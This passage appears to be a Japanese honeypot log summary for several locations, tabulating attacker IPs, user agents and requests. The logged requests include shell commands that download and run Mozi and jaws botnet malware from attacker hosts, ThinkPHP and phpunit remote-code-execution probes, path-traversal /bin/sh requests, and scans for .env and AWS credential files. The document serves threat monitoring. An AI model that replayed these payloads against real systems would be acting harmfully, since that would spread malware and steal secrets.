1 | 137.184.121.183 | United States |
1 | 143.198.235.94 | United States |
1 | 159.223.180.164 | United States |
1 | 162.142.125.219 | United States |
1 | 163.179.165.247 | China |
7 | 165.22.127.137 | United States |
1 | 172.245.20.219 | United States |
7 | 185.254.196.223 | Ukraine |
1 | 192.241.221.97 | United States |
1 | 193.124.7.9 | Czechia |
1 | 213.186.1.137 | Croatia |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
1 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
21 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36 |
20 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
1 | Opera/9.0 (Macintosh; PPC Mac OS X; U; en) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_34.68.118.83_80\n |
||
2 | \x16\x03\x01\x01D\x01 |
||
8 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
1 | GET | /.env.development |
HTTP/1.1 |
1 | GET | /.env.old |
HTTP/1.1 |
1 | GET | /.env.prod |
HTTP/1.1 |
1 | GET | /.env.production.local |
HTTP/1.1 |
1 | GET | /.env.save |
HTTP/1.1 |
22 | GET | /.env |
HTTP/1.1 |
1 | GET | /.json |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?phpinfo=1 |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /config.json |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /phpinfo.php |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//163[.]179[.]165[.]247:55075/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /spotfire/login.html |
HTTP/1.1 |
2 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/.%2e/%2e%2e/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/sphere1.png |
HTTP/1.1 |
1 | POST | /.env.development |
HTTP/1.1 |
1 | POST | /.env.old |
HTTP/1.1 |
1 | POST | /.env.prod |
HTTP/1.1 |
1 | POST | /.env.production.local |
HTTP/1.1 |
1 | POST | /.env.save |
HTTP/1.1 |
1 | POST | /.env |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
11 | 45.9.20.101 | Russia |
1 | 45.144.112.133 | United Kingdom |
1 | 46.249.33.53 | Netherlands |
1 | 51.222.194.232 | Canada |
1 | 62.122.97.50 | Russia |
2 | 101.68.211.3 | China |
7 | 104.131.102.18 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
1 | 139.162.145.250 | Netherlands |
2 | 157.230.216.203 | United States |
1 | 159.89.152.227 | United States |
1 | 185.180.143.72 | Portugal |
3 | 185.220.101.15 | Germany |
1 | 185.220.101.43 | Germany |
1 | 185.243.218.27 | Norway |
1 | 192.241.222.182 | United States |
1 | 198.235.24.14 | United States |
1 | 210.89.39.75 | India |
1 | 212.154.7.246 | Turkey |
1 | 213.186.1.137 | Croatia |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
1 | Googlebot/2.1 (+http[:]//www[.]google[.]com/bot.html) |
2 | Hello, world |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) |
1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2171.95 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
1 | Mozilla/5.0 (X11; Linux ppc64le; rv:75.0) Gecko/20100101 Firefox/75.0 |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | Roku/DVP-9.10 (289.10E04111A) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
2 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
3 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/index |
HTTP/1.1 |
1 | GET | /.svn/entries |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /KIz89PGViACfvNpQE2eoOD5u |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /api.php?key=1&apikey=1 |
HTTP/1.1 |
1 | GET | /bag2 |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+209[.]141[.]59[.]94/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//210[.]89[.]39[.]75:35243/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
2 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 20.57.32.0 | United States |
1 | 20.120.179.185 | United States |
1 | 42.51.55.220 | China |
1 | 43.134.163.17 | Singapore |
11 | 45.9.20.101 | Russia |
2 | 45.77.239.190 | United States |
1 | 45.141.157.242 | Bulgaria |
1 | 45.144.112.133 | United Kingdom |
1 | 46.249.33.53 | Netherlands |
9 | 51.79.29.48 | Canada |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 114.134.26.244 | India |
1 | 135.125.156.43 | France |
7 | 137.184.15.77 | United States |
1 | 137.184.113.41 | United States |
1 | 137.184.122.128 | United States |
1 | 156.215.203.68 | Egypt |
2 | 157.230.216.203 | United States |
1 | 159.223.180.164 | United States |
1 | 162.142.125.7 | United States |
1 | 167.94.138.118 | United States |
1 | 184.105.139.115 | United States |
1 | 185.220.100.252 | Germany |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.213.8 | United States |
1 | 198.235.24.32 | United States |
1 | 213.186.1.137 | Croatia |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
1 | Googlebot/2.1 (+http[:]//www[.]google[.]com/bot.html) |
3 | Hello, world |
1 | Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
28 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | VLC/3.0.8 LibVLC/3.0.8 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_13.67.44.234_80 |
||
3 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
26 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /Public/home/js/check.js |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /api.php?key=1&apikey=1 |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
2 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /mgmt/shared/authn/login |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+v1[.]kannimanelaji[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
2 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |